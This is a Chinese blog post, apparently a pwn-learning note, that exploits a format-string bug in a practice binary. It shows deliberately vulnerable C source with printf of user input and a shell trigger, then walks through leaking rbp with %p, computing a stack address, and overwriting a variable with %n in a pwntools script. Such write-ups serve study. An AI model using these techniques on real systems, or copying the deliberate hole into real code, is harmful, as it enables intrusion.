Pwn 学习 fmt_test_2格式化字符串

最新推荐文章于 2024-05-26 20:38:56 发布
最新推荐文章于 2024-05-26 20:38:56 发布
阅读量281 收藏
点赞数
分类专栏: Pwn 文章标签: 学习 ctf pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/126448130
版权

Pwn 学习 fmt_test_2格式化字符串

1.测试源代码

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

int test1;

int init_func(){
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0,2 ,0);
    setvbuf(stderr, 0, 2, 0);
    return 0;
}

int dofunc(){
    char buf1[0x10];
    char buf2[0x10];
    char buf3[0x10];
    int test2 = 0;
    int test3 = 0;
    while(1){
        puts("input:");
        read(0, buf1, 0x100);
        printf(buf1);
        if(test3 == 100){
            system("/bin/zsh");
        }
    }
    return 0;
}

int main(){
    init_func();
    dofunc();
    return 0;
}

2.运行测试程序

在这里插入图片描述

3.IDA静态分析

在这里插入图片描述

4.漏洞利用思路

第一次循环

  • 利用格式化字符串泄露rbp的地址
  • 根据rbp的地址计算出v1的地址

第二次循环

  • 计算写入指针地址
  • 使用%n在v1的地址上写入100
  • 注意x64程序需要对齐,x86可以不用对齐

5.gdb调试

找到rsp地址

在这里插入图片描述

  • 在程序输入时我们连续输入%p用来测试
    在这里插入图片描述
  • 等待程序打印结果
  • 观察栈上rsp的位置
    在这里插入图片描述
  • 不难看出rsp是第6个%p打印出来的

找到rbp的地址

  • 直接在栈上看,rbp就是第14个%p打印出来的
  • 我们可以使用gdb测试一下
    在这里插入图片描述
  • 使用%14$p直接打印第14个地址上的内容
    在这里插入图片描述
  • 再看一下栈
    在这里插入图片描述
  • 事实证明都是一个内容

找到v1的地址

  • 我们看到使用%p泄露的是rbp上的内容,而不是rbp本身的地址
  • 所以计算v1的地址我们要知道rbp上的内容其实是下一个rbp的地址
  • dec0是下一个rbp,与当前rbp相差0x10
    在这里插入图片描述
  • 看一下汇编代码
  • 这个v1的地址就是[rbp-8]
  • 所以经过泄露的地址加偏移
  • 最终v1的地址应该是 leak_addr - 0x18

6.exp

  • 再构造第二次payload时要注意对齐,补全16位
from pwn import *

context(log_level='debug', arch='amd64', os='linux')

pwnfile = './fmt_test_2'

io = process(pwnfile)

payload_1 = b'%14$p'

io.recvline()

io.sendline(payload_1)

rbp_content = int(io.recv()[2:14], 16)

print("content is ", hex(rbp_content))

text3_addr = rbp_content - 0x18

print("text3_addr is ", hex(text3_addr))

payload_2 = b"%100c%12$naaaaaa" + p64(text3_addr)

payload_2_test = p64(text3_addr) + b"%100c%10$hhn"

io.send(payload_2)

gdb.attach(io)

pause()

io.interactive()

7.运行结果

在这里插入图片描述

==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-2022-1 20212809 格式化字符串漏洞实验
qq_38975218的博客
12-12 1001
用户需要输入一段数据,数据保存在 user_input 数组中,程序会使用 printf 函数打印数据内容,并且该程序以 root 权限运行。更加可喜的是,这个程序存在一个格式化漏洞。让我们来看看利用这些漏洞可以搞些什么破坏。 程序说明: 程序内存中存在两个秘密值,我们想要知道这两个值,但发现无法通过读二进制代码的方式来获取它们(实验中为了简单起见,硬编码这些秘密值为 0x44 和 0x55)。尽管我们不知道它们的值,但要得到它们的内存地址倒不是特别困难,因为对大多数系统而言,每次运行程序,这些内存..
C# 字符串格式化测试小工具-C#StringFormatTester
03-02
以前一直用一个叫做“FormatDesiger”的小工具,来测试字符串格式化的输出,最近在用的时候发现有几个类型没有,如char,byte,guid,今天把FormatDesiger稍微改了一下,增加了这几个类型。
字符串格式化测试
agnsm00804的专栏
03-26 115
private void button1_Click(object sender, EventArgs e) { Console.WriteLine("在宽度为的空间里靠左对齐:{0,-10}", 99); Console.WriteLine("在宽度为的空间里靠右对齐:{0,10}", 99); Conso...
Pwn·fmt学习笔记
最新发布
qq_22607673的博客
05-26 804
pwn的blind fmt
格式化字符串漏洞自动检测与测试用例生成
04-30
格式化字符串漏洞是一种危害高、影响广的软件漏洞。当前漏洞检测方式存在人工依赖度高、误报率高、检测模型单一、未能充分考虑格式化字符串漏洞特点等多种局限性。针对以上问题,对格式化字符串漏洞特征进行分析,设计并实现了一种基于符号执行的格式化字符串漏洞自动检测与测试用例生成的系统。该方法可自动检测Linux下二进制程序中格式化字符串漏洞的存在性,判定其是否可能导致任意内存读写危害,并生成稳定有效的测试用例。
格式化字符串
寄北测试学习进阶记录
01-04 580
格式化字符串 在python字符串中如果有%,代表这个字符串格式化字符串 %d代表格式化的是一个整数 %05d代表输入至少5位长,如果不足5位,左补0 %f代表格式化的是一个浮点数 %.2f 保留小数点后2位 %s代表个事啊的是一个字符串 %%代表就要显示一个%而已 下面展示一些 内联代码片。 name = "小明" age = 18 # 我的名字叫小明,年龄是18岁 # print("我的名字叫" + name + ",年龄是" + str(age) + "岁") print("我的名字叫%s,年龄
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
开发者或学习者可以通过分析 "PWN.c" 的源代码了解如何在 AVR 上配置 PWM 定时器,以及如何通过编程控制 PWM 输出。同时,结合 "www.pudn.com.txt" 文件,可以获取项目背景、使用教程或其他相关资源。另外,项目可能...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。 **...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
2. **测试平台文件**(如`testbench.v`):用于对`pwm_generator`模块进行仿真测试,提供输入激励并检查输出。 3. **仿真结果**(如`wave.vcd`):使用仿真工具如ModelSim或Icarus Verilog生成的波形文件,显示信号...
[2020 GeekChallange] Pwn fmt
Nashi_Ko的博客
11-18 532
[2020 GeekChallange] fmt 0x00 格式化字符串漏洞 提示格式化字符串漏洞 简单介绍一下原理: 在写C语言时,不免经常使用printf函数,这个函数有一个很常见的用法: a = 24; printf("%d岁,是学生",a); 输出结果很显然是 24岁,是学生 但是如果出现这么个情况: a = "%p.%p.%p.%p." printf(a) 它就会输出栈的后4个地址。 a = "%4$p" printf(a) 单独输出第四个地址 a = "%4$s" printf(a)
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1131
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 1971
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
[BUUCTF]PWN——judgement_mna_2016(32位fmt
mcmuyanga的博客
03-18 437
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 602
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
Pwn】2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1019
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
Pwn 学习 fmt_str_level_1_x64 格式化字符串
MrTreebook的博客
09-10 339
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload。pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值